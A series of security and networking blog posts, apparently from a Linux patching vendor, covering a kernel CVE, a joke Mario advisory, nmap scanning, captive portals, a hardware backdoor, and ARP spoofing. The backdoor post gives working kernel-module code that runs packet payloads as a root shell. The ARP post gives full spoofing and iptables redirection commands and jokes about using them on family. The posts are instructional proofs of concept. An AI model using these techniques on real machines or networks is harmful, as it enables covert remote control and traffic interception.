Thursday Aug 08, 2013

CVE-2013-2224: Denial of service in sendmsg().

In September 2012, CVE-2012-3552 was reported which could allow an attacker to corrupt slab memory which could lead to a denial-of-service or possible privilege escalation depending on the target machine workload.  This bug had originally been fixed in the mainline kernel in April 2011 and was a fairly large patch for a security fix.  The RedHat backport for this fix introduced a new bug which has been assigned CVE-2013-2224 which again could allow for a denial-of-service or possible privilege escalation.  Rack911 & Tortoiselabs created a reproducer in June 2013 which would allow an unprivileged user to cause a denial-of-service.

RedHat have not yet released a kernel with this CVE fixed, but CentOS have released a custom kernel with the vendor fix for CentOS 6.

We have just released a Ksplice update to address this issue for releases 5 and 6 of Oracle Linux, RedHat Enterprise Linux, CentOS and Scientific Linux.  We recommend that all users of Ksplice on these distributions install this zero-downtime update.

[Read More]

Thursday Mar 31, 2011

Security Advisory: Plumber Injection Attack in Bowser's Castle

Advisory Name:
Plumber Injection Attack in Bowser's Castle
Release Date:
Bowser's Castle
Affected Versions:
Super Mario Bros., Super Mario Bros.: The Lost Levels
Advisory URL:

Vulnerability Overview

Multiple versions of Bowser's Castle are vulnerable to a plumber injection attack. An Italian plumber could exploit this bug to bypass security measures (walk through walls) in order to rescue Peach, to defeat Bowser, or for unspecified other impact.


This vulnerability is demonstrated by "happylee-supermariobros,warped.fm2". Attacks using this exploit have been observed in the wild, and multiple other exploits are publicly available.

Affected Versions

Versions of Bowser's Castle as shipped in Super Mario Bros. and Super Mario Bros.: The Lost Levels are affected.


An independently developed patch is available:

--- a/smb.asm   1985-09-13 12:00:00.000000000 +0900
+++ b/smb.asm   2011-04-01 12:00:00.000000000 -0400
@@ -12009,12015 +12009,12015 @@
         ldy $04
         cpy #$05
         bcc *+$09
-        lda $45
+        lda #$01
         sta $00
         jmp $df4b
         jsr $dec4

A binary hot patch to apply the update to an existing version is also available.

All users are advised to upgrade.


For users unable to apply the recommended fix, a number of mitigations are possible to reduce the impact of the vulnerability.


Potential mitigations include:


The vulnerability was originally discovered by Mario and Luigi, of Mario Bros. Security Research.

The provided patch and this advisory were prepared by Lakitu Cloud Security, Inc. The hot patch was developed in collaboration with Ksplice, Inc.

Product Overview

Bowser's Castle is King Bowser's home and the base of operations for the Koopa Troop. Bowser's Castle is the final defense against assaults by Mario to kidnap Princess Peach, and is guarded by Bowser's most powerful minions.


Monday Feb 21, 2011

Mapping your network with nmap

If you run a computer network, be it home WiFi or a global enterprise system, you need a way to investigate the machines connected to your network. When ping and traceroute won't cut it, you need a port scanner.

nmap is the port scanner. It's a powerful, sophisticated tool, not to mention a movie star. The documentation on nmap is voluminous: there's an entire book, with a free online edition, as well as a detailed manpage. In this post I'll show you just a few of the cool things nmap can do.

The law and ethics of port scanning are complex. A network scan can be detected by humans or automated systems, and treated as a malicious act, resulting in real costs to the target. Depending on the options you choose, the traffic generated by nmap can range from "completely innocuous" to "watch out for admins with baseball bats". A safe rule is to avoid scanning any network without the explicit permission of its administrators — better yet if that's you.

You'll need root privileges on the scanning system to run most interesting nmap commands, because nmap likes to bypass the standard network stack when synthesizing esoteric packets.

A firm handshake

Let's start by scanning my home network for web and SSH servers:

root@lyle# nmap -sS -p22,80
Nmap scan report for
22/tcp filtered ssh
80/tcp open     http

Nmap scan report for
22/tcp filtered ssh
80/tcp filtered http

Nmap scan report for
22/tcp open   ssh
80/tcp closed http

Nmap done: 256 IP addresses (3 hosts up) scanned in 6.05 seconds

We use -p22,80 to ask for a scan of TCP ports 22 and 80, the most popular ports for SSH and web servers respectively. If you don't specify a -p option, nmap will scan the 1,000 most commonly-used ports. You can give a port range like -p1-5000, or even use -p- to scan all ports, but your scan will take longer.

We describe the subnet to scan using CIDR notation. We could equivalently write

The option -sS requests a TCP SYN scan. nmap will start a TCP handshake by sending a SYN packet. Then it waits for a response. If the target replies with SYN/ACK, then some program is accepting our connection. A well-behaved client should respond with ACK, but nmap will simply record an open port and move on. This makes an nmap SYN scan both faster and more stealthy than a normal call to connect().

If the target replies with RST, then there's no service on that port, and nmap will record it as closed. Or we might not get a response at all. Perhaps a firewall is blocking our traffic, or the target host simply doesn't exist. In that case the port state is recorded as filtered after nmap times out.

You can scan UDP ports by passing -sU. There's one important difference from TCP: Since UDP is connectionless, there's no particular response required from an open port. Therefore nmap may show UDP ports in the ambiguous state open|filtered, unless you can prod the target application into sending you data (see below).

To save time, nmap tries to confirm that a target exists before performing a full scan. By default it will send ICMP echo (the ubiquitous "ping") as well as TCP SYN and ACK packets. You can use the -P family of options to customize this host-discovery phase.

Weird packets

nmap has the ability to generate all sorts of invalid, useless, or just plain weird network traffic. You can send a TCP packet with no flags at all (null scan, -sN) or one that's lit up "like a Christmas tree" (Xmas scan, -sX). You can chop your packets into little fragments (--mtu) or send an invalid checksum (--badsum). As a network administrator, you should know if the bad guys can confuse your security systems by sending weird packets. As the manpage advises, "Let your creative juices flow".

There's a second benefit to sending weird traffic: We can identify the target's operating system by seeing how it responds to unusual situations. nmap will perform this OS detection if you specify the -O flag:

root@lyle# nmap -sS -O
Nmap scan report for
Not shown: 998 filtered ports
23/tcp   closed telnet
80/tcp   open   http
MAC Address: 00:1C:10:33:6B:99 (Cisco-Linksys)
Device type: WAP|broadband router
Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X
Nmap scan report for
Not shown: 998 filtered ports
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
MAC Address: 00:1F:3A:7F:7C:26 (Hon Hai Precision Ind.Co.)
Warning: OSScan results may be unreliable because we could not find
  at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : Microsoft Windows Vista|2008|7 (98%)
Nmap scan report for
All 1000 scanned ports on are closed
MAC Address: 7C:61:93:53:9F:E5 (Unknown)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:

Since the first target has both an open and a closed port, nmap has many protocol corner cases to explore, and it easily recognizes a Linksys home router. With the second target, there's no port in the closed state, so nmap isn't as confident. It guesses a Windows OS, which seems especially plausible given the open NetBIOS ports. In the last case nmap has no clue, and gives us some raw findings only. If you know the OS of the target, you can contribute this fingerprint and help make nmap even better.

Behind the port

It's all well and good to discover that port 1234 is open, but what's actually listening there? nmap has a version detection subsystem that will spam a host's open ports with data in hopes of eliciting a response. Let's pass -sV to try this out:

root@lyle# nmap -sS -sV
Nmap scan report for
Not shown: 998 closed ports
443/tcp  open  ssh     OpenSSH 5.5p1 Debian 6 (protocol 2.0)
8888/tcp open  http    thttpd 2.25b 29dec2003

nmap correctly spotted an HTTP server on non-standard port 8888. The SSH server on port 443 (usually HTTPS) is also interesting. I find this setup useful when connecting from behind a restrictive outbound firewall. But I've also had network admins send me worried emails, thinking my machine has been compromised.

nmap also gives us the exact server software versions, straight from the server's own responses. This is a great way to quickly audit your network for any out-of-date, insecure servers.

Since a version scan involves sending application-level probes, it's more intrusive and can cause more trouble. From the book:

In the nmap-service-probes included with Nmap the only ports excluded are TCP port 9100 through 9107. These are common ports for printers to listen on and they often print any data sent to them. So a version detection scan can cause them to print many pages full of probes that Nmap sends, such as SunRPC requests, help statements, and X11 probes.

This behavior is often undesirable, especially when a scan is meant to be stealthy.

Trusting the source

It's a common (if questionable) practice for servers or firewalls to trust certain traffic based on where it appears to come from. nmap gives you a variety of tools for mapping these trust relationships. For example, some firewalls have special rules for traffic originating on ports 53, 67, or 20. You can set the source port for nmap's TCP and UDP packets by passing --source-port.

You can also spoof your source IP address using -S, and the target's responses will go to that fake address. This normally means that nmap won't see any results. But these responses can affect the unwitting source machine's IP protocol state in a way that nmap can observe indirectly. You can read about nmap's TCP idle scan for more details on this extremely clever technique. Imagine making any machine on the Internet — or your private network — port-scan any other machine, while you collect the results in secret. Can you use this to map out trust relationships in your network? Could an attacker?

Bells and whistles

So that's an overview of a few cool nmap features. There's a lot we haven't covered, such as performance tuning, packet traces, or nmap's useful output modes like XML or ScRipT KIdd|3. There's even a full scripting engine with hundreds of useful plugins written in Lua.


Monday Jan 17, 2011

Coffee shop Internet access

How does coffee shop Internet access work?

wireless coffee

You pull out your laptop and type into the URL bar on your browser. Instead of your friendly search box, you get a page where you pay money or maybe watch an advertisement, agree to some terms of service, and are only then free to browse the web.

What is going on behind the scenes to give the coffee shop that kind of control over your packets? Let's trace an example of that process from first broadcast to last redirect and find out.

Step 1: Get our network configuration

When I first sit down and turn on my laptop, it needs to get some network information and join a wireless network.

My laptop is configured to use DHCP to request network configuration information and an IP address from a DHCP server in its Layer 2 broadcast domain.

This laptop happens to use the DCHP client dhclient. /etc/dhcp3/dhclient.conf is a sample dhclient configuration file describing among other things what the client will request from a DHCP server (your network manager might frob that configuration -- on my Ubuntu laptop, NetworkManager keeps a modified config at /var/run/nm-dhclient-wlan0.conf).

A DHCP negotiation happens in 4 parts:


Step 1: DHCP discovery. The DHCP client (us, in the screencap) sends a message to Ethernet broadcast address ff:ff:ff:ff:ff:ff to discover DHCP servers (Wireshark shows IP addresses in the summary view, so we see broadcast IP address The packet includes a parameter request list with the parameters in the dhclient config file. The parameters in my /var/run/nm-dhclient-wlan0.conf are:

subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;
Step 2: DHCP offer. DHCP servers that get the discovery broadcast allocate an IP address and respond with a DHCP broadcast containing that IP address and other lease information. This is typically a simple race -- whoever gets an offer packet to the requester first wins. In our case, only MAC address 00:90:fb:17:ca:4e (Wireshark shows IP address answers our discovery broadcast.

Step 3: DHCP request. The DHCP client picks an offer and sends another DHCP broadcast, informing the DHCP servers of the winner and letting the losers de-allocate their reserved IP addresses.

Step 4: DHCP acknowledgment. The winning DHCP server acknowledges completion of the DHCP exchange and reiterates the DHCP lease parameters. We now have an IP address ( and know the IP address of our gateway router (

DHCP lease

Step 2: Find our gateway

We managed to get a lot done using broadcast packets, but at this point a) nobody in our broadcast domain knows our MAC address, and b) we don't know the MAC address of our gateway, so we can't get any packets routed out to the Internet. Let's fix that:


Before offering us IP address, the DHCP server (Portwell_17:ca:4) sends an ARP request for that address, saying "Who has If that's you, respond with your MAC address". Since nobody answers, the server can be fairly confident that the IP address is not already in use.

After getting assigned IP address, we (Apple_8f:95:3f) double-check that nobody else is using it with a few ARP requests that nobody answers. We then send a few gratuitous ARPs to let everyone know that it's ours and they should update their ARP caches.

We then make an ARP request for the MAC address corresponding to the IP address for our gateway router: Our DHCP server happens to also be our gateway router and responds claiming the address.

Step 3: Get past the terms of service

Now that we have an IP address and know the IP address of our gateway, we should be able to send packets through our gateway and out to the Internet.

I type into my browser's URL bar. There is no period at the end, so the local DNS resolver can't tell if this is a fully-qualified domain name. This is what happens:

DNS resolution

Looking back at the DHCP acknowledgement, as part of the lease we were given a domain name: What our local DNS resolver decides to do with host, since it potentially isn't fully-qualified, is append the domain name from the DHCP lease to it (eg in the first iteration) and try to resolve that. When the resolution fails, it tries appending decreasingly specific parts of the DHCP domain name, finds that all of them fail, and then gives up and tries to resolve plain old This works, and we get back IP address A whois after the fact confirms that this is Google:

jesstess@pretzel-logic:~$ whois
NetRange: -
OriginAS:       AS15169
NetName:        GOOGLE
OrgName:        Google Inc.
OrgId:          GOGL
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
We complete a TCP handshake with ``'' and make an HTTP GET request for the resource we want (/). Instead of getting back an HTTP 200 and the Google home page, we receive a 302 redirect to MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F&IpAddr=192%2e168%2e5%2e87& vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc&vsgId=93196& UserAgent=&ProxyHost=:

TCP handshake + HTTP

Our MAC address and IP address are conveniently encoded in the redirect URL.

So what is going on here? Why didn't we get back the Google home page?

Our DHCP server/router,, is capturing our HTTP traffic and redirecting it to a special landing page. We don't get to make it out to Google until we finish playing a game with the coffee shop.

Let's dwell on this for a moment, because it's kind of amazing that the way the Internet is designed, our gateway router can hijack our HTTP requests and we can't stop it. In this case, we can see that the URL has changed in our browser after the redirect, but if a malicious gateway were transparently proxying our HTTP requests to an evil malware-laden clone of, we'd have no way to notice because there wouldn't be a redirect and the URL wouldn't change.

Worrisome? Definitely, if you're trusting a gateway with sensitive information. If you don't want to have to trust your gateway, you have to use point-to-point encryption: HTTPS, SSH, your favorite IPSec or SSL VPN, etc. And then hope there aren't bugs in your secure protocol's implementation.

Well, ain't nothing to it but to do a DNS lookup on the host name in the redirect ( and make our request there:


nmd is a host in the domain from our DHCP lease, so our local resolver's rules manage to resolve it in one try, and we get IP address This is incidentally the IP address of the DHCP Server Identifier we received with our DHCP lease.

We try our HTTP GET request again there and get back an HTTP 200 and a landing page (still not the Google home page), which the browser renders.

The landing page has some ads and terms of service, and a button to click that we're told will grant us Internet access. That click generates an HTTP POST:

get to

Step 4: Get to Google

Having agreed to the terms of service, communicates to our gateway router that our MAC address (which was passed in the redirect URL) should be added to a whitelist, and our traffic shouldn't be captured and redirected anymore -- our HTTP packets should be allowed out onto the Internet. responds to our POST with a final HTTP 302 redirect, this time to We do a final DNS lookup, make our HTTP GET, and get served an HTTP 200 and a webpage with some ads enticing us to level up our coffee addiction. We now have real Internet access and can get to

And that's the story! This ability to hijack HTTP traffic at a gateway until terms are met has over the years facilitated a huge industry based around private WiFi networks at coffee shops, airports, and hotels.

It is also a reminder about just how much control your gateway, or a device pretending to be your gateway, has when you use insecure protocols. Upside-down-ternet is a playful example of exploiting the trust in your gateway, but bogus DNS resolution or transparently proxying requests to malicious sites makes use of this same principle.


Tuesday Oct 26, 2010

Hosting backdoors in hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
	char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
	char *envp[1] = {NULL};
	call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);
	return 0;
We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
	.handler = exec_packet,
	.no_policy = 1,
	.netns_ok = 1

int init_module(void)
	return (inet_add_protocol(&proto163_protocol, 163) < 0);
Let's build and load the module:
rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko
Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x
Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code.

What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less
One of the output lines is this one:
<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.
This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines a "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.


Wednesday Sep 29, 2010

Hijacking HTTP traffic on your home subnet using ARP and iptables

Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.

Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state.

The setup

Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage:

will you marry me, with unicorns

How do we accomplish this?

The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address.

ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway.

Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address", and the gateway broadcasts an ARP response saying "I have, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet.

But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients.

Step 1: The layout

I did this at home. The three machines involved were:

  • real gateway router: IP address, MAC address 68:7f:74:9a:f4:ca
  • fake gateway: a desktop called kid-charlemagne, IP address, MAC address 00:30:1b:47:f2:74
  • test machine getting duped: a laptop on wireless called pixeleen, IP address, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains.

Step 2: Enable IPv4 forwarding

kid-charlemagne wants to be receiving packets that aren't destined for it (eg the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So step 1 is to enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward:

root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3: Set routing rules so packets going through the gateway get routed to you

kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes final destination for the web traffic:

PREROUTING rule to rewrite the source IP address

For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet.

We can set up this routing rule with the following iptables command:

jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp --dport 80 -j NETMAP --to

The iptables command has 3 components:

  • When to apply a rule (-A PREROUTING)
  • What packets get that rule (-p tcp --dport 80)
  • The actual rule (-t nat ... -j NETMAP --to

-t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied.

What packets

That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action:

The rule

If we receive a packet heading for some destination, rewrite the destination in the IP header to be (NETMAP --to Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination.

In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address,, the destination, NATting both ways so this is transparent to the source."

One last thing:

The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an ip entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0.

jesstess@kid-charlemagne:~$ sudo ip addr add dev eth0

We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address, and the gateway address

jesstess@kid-charlemagne:~$ ip addr
3: eth0:  mtu 1500 qdisc noqueue state UNKNOWN
    link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
    inet scope global secondary eth0
    inet6 fe80::230:1bff:fe47:f274/64 scope link
       valid_lft forever preferred_lft forever

Step 4: Set yourself up to respond to HTTP requests

kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting.

Step 5: Test pretending to be the gateway

At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for”. Machines that hear that Gratuitous ARP will replace an existing mapping from to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP.

We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitious ARP is working.

pixeleen’s ARP cache before the Gratuitous ARP:

jesstess@pixleen$ arp -a
? ( at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet]
? ( at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

68:7f:74:9a:f4:ca is the MAC address of the real gateway router.

There are lots of command line utilities and bindings in various programming language that make it easy to issue ARP packets. I used the arping tool:

jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0

We'll send a Gratuitous ARP reply (-A), three times (-c -3), on the eth0 interface (-l eth0) for IP address

As soon as we generate the Gratuitous ARPs, if we check pixeleen’s ARP cache:

jesstess@pixeleen$ arp -a
? ( at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]
? ( at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

Bam. pixeleen now thinks the MAC address for IP address is 0:30:1b:47:f2:74, which is kid-charlemagne’s address.

If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne’s web server.

We can watch this whole exchange in Wireshark:

First, the Gratuitous ARPs generated by kid-charlemagne:

Gratuitous ARPs generated by kid-c

The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet:

DNS response to pixeleen for

The HTTP traffic gets served by kid-charlemagne:

HTTP traffic viewed in Wireshark

Note that the HTTP request has a source IP of, pixeleen, and a destination IP of, which dig -x +short tells us is The HTTP response has a source IP of and a destination IP of The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer.

Step 6: Deploy against friends and family

I trust you to get creative with this.

Step 7: Reset everything to the normal state

To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule:

jesstess@kid-charlemagne:~$ sudo ip addr delete dev eth0
jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to

